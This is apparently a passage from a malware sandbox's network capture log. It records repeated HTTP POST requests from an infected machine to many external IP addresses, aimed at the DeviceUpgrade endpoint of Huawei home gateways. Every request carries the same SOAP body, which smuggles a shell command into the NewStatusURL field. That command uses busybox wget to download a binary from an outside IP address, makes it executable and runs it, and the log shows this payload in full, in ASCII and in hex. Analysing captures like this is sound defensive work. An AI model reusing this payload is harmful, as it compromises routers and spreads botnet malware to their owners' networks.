                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376657009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191195965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      107192.168.2.1437242102.163.201.6437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.723433971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658124924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746072054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889952898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241770029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945396900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376629114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191339970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      108192.168.2.1455398156.249.183.16637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.725327969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 